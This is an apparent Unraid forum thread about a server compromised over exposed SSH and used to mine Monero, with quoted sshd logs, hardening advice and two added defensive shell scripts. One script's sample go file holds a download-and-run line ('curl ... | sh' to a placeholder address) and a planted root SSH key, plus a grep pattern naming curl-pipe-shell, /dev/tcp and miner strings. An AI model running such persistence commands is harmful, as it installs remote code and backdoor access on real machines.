Unknown docker container installed



An unknown docker container named "modest_ardinghelli" was installed and pinned my server.  I believe it was mining. I'm obviously concerned with how it got there. My server is not open to the internet. Any tips on how to secure things and prevent this from happening again would be appreciated.

 

Attached is the log I pulled from the docker.

unknown docker log.txt

Link to comment
6 hours ago, ihaveskittles said:

My server is not open to the internet

You've forwarded the access port for ssh directly to the internet (or have the server within a DMZ).

Mar 17 20:48:05 TheAbyss sshd[9160]: Accepted none for adm from 109.236.89.61 port 41065 ssh2
Mar 17 20:48:06 TheAbyss sshd[9162]: error: connect to 2a00:1450:400e:80b::200e port 80 failed: Network is unreachable
Mar 17 20:48:58 TheAbyss sshd[3933]: error: connect_to whois.tucows.com port 19954: failed.
Mar 17 20:49:47 TheAbyss sshd[9729]: Accepted none for adm from 194.88.107.165 port 36616 ssh2
Mar 17 20:49:48 TheAbyss sshd[9731]: error: connect to 2a00:1148:db00:0:b0b0::1 port 80 failed: Network is unreachable
Mar 17 20:50:50 TheAbyss sshd[10144]: Accepted none for root from 49.88.112.118 port 64282 ssh2
Mar 17 20:50:50 TheAbyss sshd[10144]: Received disconnect from 49.88.112.118 port 64282:11: 
Mar 17 20:50:50 TheAbyss sshd[10144]: Disconnected from user root 49.88.112.118 port 64282

And on and on...  Only a matter of time.

Link to comment
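An added example, not part of Squid's post or of the thread: a small POSIX shell triage of an sshd log, run here over constructed lines that mirror the ones quoted above (same hostname and source addresses, plus a few failed guesses and one normal key login from the LAN) and, on a live box, over /var/log/auth.log, /var/log/secure or the output of journalctl -u sshd. Two details of the quoted lines are worth reading correctly: OpenSSH logs "Accepted none" when the none authentication method succeeds, which sshd only does for an account whose password is empty (and only while PermitEmptyPasswords is on), so those lines mean an empty password rather than a guessed one; and the "error: connect to ... port 80 failed" lines that follow each login are sshd failing to open a TCP forward that the logged-in session asked for, i.e. the intruder was also relaying traffic through the box.

```shell
#!/bin/sh
# Added example, not from the thread: triage an sshd log. The sample lines are
# constructed to mirror the ones quoted in the thread (same host and source
# addresses) with a few failed guesses and one normal key login from the LAN;
# on a live box pass the real log file instead of $SAMPLE_LOG.

SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Mar 17 20:45:10 TheAbyss sshd[8801]: Failed password for root from 49.88.112.118 port 60001 ssh2
Mar 17 20:45:12 TheAbyss sshd[8801]: Failed password for root from 49.88.112.118 port 60001 ssh2
Mar 17 20:45:15 TheAbyss sshd[8804]: Failed password for root from 49.88.112.118 port 60002 ssh2
Mar 17 20:46:30 TheAbyss sshd[8900]: Invalid user admin from 109.236.89.61 port 41001
Mar 17 20:46:30 TheAbyss sshd[8900]: Failed password for invalid user admin from 109.236.89.61 port 41001 ssh2
Mar 17 20:48:05 TheAbyss sshd[9160]: Accepted none for adm from 109.236.89.61 port 41065 ssh2
Mar 17 20:48:06 TheAbyss sshd[9162]: error: connect to 2a00:1450:400e:80b::200e port 80 failed: Network is unreachable
Mar 17 20:48:58 TheAbyss sshd[3933]: error: connect_to whois.tucows.com port 19954: failed.
Mar 17 20:49:47 TheAbyss sshd[9729]: Accepted none for adm from 194.88.107.165 port 36616 ssh2
Mar 17 20:49:48 TheAbyss sshd[9731]: error: connect to 2a00:1148:db00:0:b0b0::1 port 80 failed: Network is unreachable
Mar 17 20:50:50 TheAbyss sshd[10144]: Accepted none for root from 49.88.112.118 port 64282 ssh2
Mar 17 20:55:00 TheAbyss sshd[10300]: Accepted publickey for root from 192.168.1.20 port 50112 ssh2
EOF

# Every successful login as "<method> <user> <source>". Fields are located
# relative to the word "Accepted" so the syslog or journal prefix does not matter.
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted / {
        for (i = 1; i <= NF; i++) if ($i == "Accepted") print $(i+1), $(i+3), $(i+5)
    }' "$1"
}

# Method "none" is the empty-password method: sshd only accepts it when the
# account has no password at all (and PermitEmptyPasswords is on). Each line
# here is an account that needs a password set, not a password to rotate.
empty_password_logins() {
    accepted_logins "$1" | awk '$1 == "none" { print $2, $3 }'
}

# Failed guesses per source, busiest first, as "<count> <source>".
failed_by_source() {
    awk '/sshd\[[0-9]+\]: (Failed password|Invalid user)/ {
        for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1)
    }' "$1" | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# "error: connect to HOST port N failed" and "error: connect_to ..." are sshd
# failing to open a TCP forward (direct-tcpip) that a logged-in session asked
# for: the intruder was relaying traffic through the box. Returns the count.
forward_failures() {
    grep -c 'sshd\[[0-9]*\]: error: connect' "$1"
}

echo "== successful logins (method user source)"; accepted_logins "$SAMPLE_LOG"
echo "== empty-password logins (user source)";   empty_password_logins "$SAMPLE_LOG"
echo "== failed guesses by source";              failed_by_source "$SAMPLE_LOG"
echo "== tcp-forward failures: $(forward_failures "$SAMPLE_LOG")"
```

The functions only need awk, grep, sort and uniq, so they run unchanged on the Unraid box itself; the source list from failed_by_source is what you would feed a firewall drop rule, and anything in empty_password_logins is the account to fix first.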

What Squid said. Your logs are full of thousands of attempts to SSH (and sometimes Telnet) into your server. Looks like it was a successful brute-force attempt via a botnet.

 

Also you're right about the container, it's mining Monero.

 

Not comprehensive and there are probably some better guides out there, but just some suggestions based on your situation:

  1. Now that you know it's not isolated, make sure you isolate the server from the internet. Whether that takes putting it behind a router or (if it already is) disabling port forwarding to SSH, this is the main reason you were compromised.
  2. Change your root password, someone knows it.
  3. Update to 6.9.1 unless you're holding off for a reason.
  4. Enable HTTPS on your Unraid instance if you haven't already, to prevent your root password being leaked to your network if you log in via a web browser. I'd still do this even if you trust the security of the devices on your local network, because you never really know.
  5. Be extremely cautious in both the short and long term and check your configuration and data for signs of manipulation. If someone has been able to ssh into your root account and add a docker container, they could have done just about anything. Restarting Unraid after the event could hide the signs of it. You can do this using something like ClamAV, but I'd also recommend going through it by hand. Keep in mind that recent modified dates / created dates can be manipulated.
  6. Check /boot/config/go for anything you didn't put in there. It doesn't look like this was an Unraid-specific attack, but this is the most obvious file someone would use to set up persistent key-based ssh access (to get around password changes). Once your server is no longer exposed to the internet it shouldn't be an issue anyway, but just to be safe.
  7. If you haven't yet / don't want to restart your server, delete /boot/config/ssh/authorized_keys to reset authorised ssh keys (used for password-less SSH login).
  8. Really just a comfort thing: if you're on a dynamic IP and don't use a dynamic DNS service, get a new IP from your ISP to (at least temporarily) stop the constant attempts. If you are using a dynamic DNS service, keep in mind that you're currently a target and it might be best to change your address. If you're on a static IP, like I said, it's really just for comfort anyway because, to reiterate, once the ssh service is no longer exposed no one should be able to remotely ssh into your server.
  9. Never port forward to port 22. If you need external ssh access, change it to another port. A lot of malicious scripts just scan a list of IPs to see which have port 22 open and then try to brute-force their way in; most likely this is what happened to you.
  10. Also, keep an eye out for unexpected traffic from your server. There's a real possibility it's part of the botnet now.
Link to comment
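Steps 6, 7 and 9 of the list above as shell functions, added here as an example and not taken from lnxd's post or from Unraid itself. Each function takes a path, so it can be pointed at the live files (/boot/config/go, /boot/config/ssh/authorized_keys and whichever sshd_config your Unraid version actually loads, a path this example leaves to you) or at the constructed samples it ships with. The sshd_config pair is my own: the weak file is the combination that let the "Accepted none" logins through (empty passwords permitted, password login on for root, port 22), the hardened one is key-only, forbids empty passwords, disables TCP forwarding because the quoted log shows the session being used as a proxy, and uses 2222 as an arbitrary non-default port. The key material and the 198.51.100.7 address in the sample go file are fake.

```shell
#!/bin/sh
# Added example, not from the thread: checks for steps 6, 7 and 9 above, each
# a function that takes a path so it runs against the live files
# (/boot/config/go, /boot/config/ssh/authorized_keys, the sshd_config in use)
# or against the constructed samples below. Which sshd_config Unraid loads
# depends on the version, so that path is deliberately not hard-coded here.

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed go file: the stock lines plus the kind of persistence an intruder
# with a root shell would append. The key and the address are fake.
cat > "$WORK/go" <<'EOF'
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYFORTHISEXAMPLEONLY000000000 x' >> /root/.ssh/authorized_keys
curl -s http://198.51.100.7/x.sh | sh
EOF

# Constructed sshd_config pair: what let the logins in the thread happen, and
# the corrected settings (2222 is just an example of a non-default port).
cat > "$WORK/sshd_config.weak" <<'EOF'
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
EOF
cat > "$WORK/sshd_config.hardened" <<'EOF'
Port 2222
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
AllowTcpForwarding no
EOF
printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYFORTHISEXAMPLEONLY000000000 x\n' > "$WORK/authorized_keys"

# Step 6: lines in the go script that look like persistence (key installs,
# download-and-run one-liners, decoded payloads, cron, extra containers,
# miner names). Prints "<lineno>:<line>". No output means nothing matched,
# not that the file is clean, so still read the whole file once.
audit_go() {
    grep -nE 'authorized_keys|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|crontab|docker[[:space:]]+run|nohup|/dev/tcp/|xmrig|stratum' "$1"
}

# Step 9, plus the directive behind "Accepted none": report each weak effective
# sshd setting as "<directive> <value>". The last occurrence of a directive
# wins, as in sshd, and sshd's defaults apply when a directive is absent
# (PasswordAuthentication yes, PermitEmptyPasswords no, Port 22). Match blocks
# are not handled.
audit_sshd_config() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        { last[tolower($1)] = $2 }
        END {
            pa = ("passwordauthentication" in last) ? last["passwordauthentication"] : "yes"
            pe = ("permitemptypasswords" in last)   ? last["permitemptypasswords"]   : "no"
            po = ("port" in last)                   ? last["port"]                   : "22"
            if (last["permitrootlogin"] == "yes") print "PermitRootLogin yes"
            if (pa == "yes")                      print "PasswordAuthentication yes"
            if (pe == "yes")                      print "PermitEmptyPasswords yes"
            if (po == "22")                       print "Port 22"
        }' "$1"
}

# Step 7 without destroying evidence: move the key file aside under a
# timestamped name and leave an empty file in its place. The moved copy shows
# which key the intruder planted. Also check the copy the running system uses,
# /root/.ssh/authorized_keys, since the /boot copy is only read at boot.
quarantine_authorized_keys() {
    [ -f "$1" ] || return 0
    mv "$1" "$1.compromised.$(date +%Y%m%d%H%M%S)" || return 1
    : > "$1"
    chmod 600 "$1" 2>/dev/null || true   # no-op on the FAT-formatted /boot flash
}

echo "== go script lines to look at";       audit_go "$WORK/go"
echo "== weak settings, sample config";     audit_sshd_config "$WORK/sshd_config.weak"
echo "== weak settings, hardened config (expect none)"; audit_sshd_config "$WORK/sshd_config.hardened"
quarantine_authorized_keys "$WORK/authorized_keys"
echo "== quarantined key file:";            ls "$WORK" | grep compromised
```

Run audit_go and audit_sshd_config read-only first; quarantine_authorized_keys is the only function that changes anything, and it keeps the old file. Whatever audit_sshd_config reports on a hardened file is what still needs attention, and if the answer to step 9 is WireGuard rather than an exposed port, the hardened settings still apply to the ssh service behind it.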
11 minutes ago, trurl said:

If you need to access your server outside your LAN use VPN. Wireguard VPN is built-in, just install the plugin and see its Support thread. 

Great point. I recently changed to Wireguard from passwordless ssh and it’s super easy with that plugin.

Link to comment

Thanks for the replies. They were most helpful.

 

For the curious, I know how my server became vulnerable. About three weeks ago I had a major network issue (it completely broke) and long story short I ended up removing my firewall (Ubiquiti USG), because it stopped working. I saw this as an opportunity to install pfSense onto my server as a VM. However, life, work, and health kept me from completing this in a timely manner. Now four days ago I got my server back online (was offline) in preparation to install pfSense, in the hope of upcoming free time, and yesterday is when my server was breached. Apparently, I never turned the firewall from my ISP modem back on. 

 

To conclude, the rest of my devices on my network are fine, the network is secure again, IP address changed, and looking forward to combing through my server, connecting it back to the network and installing pfSense. 

Link to comment
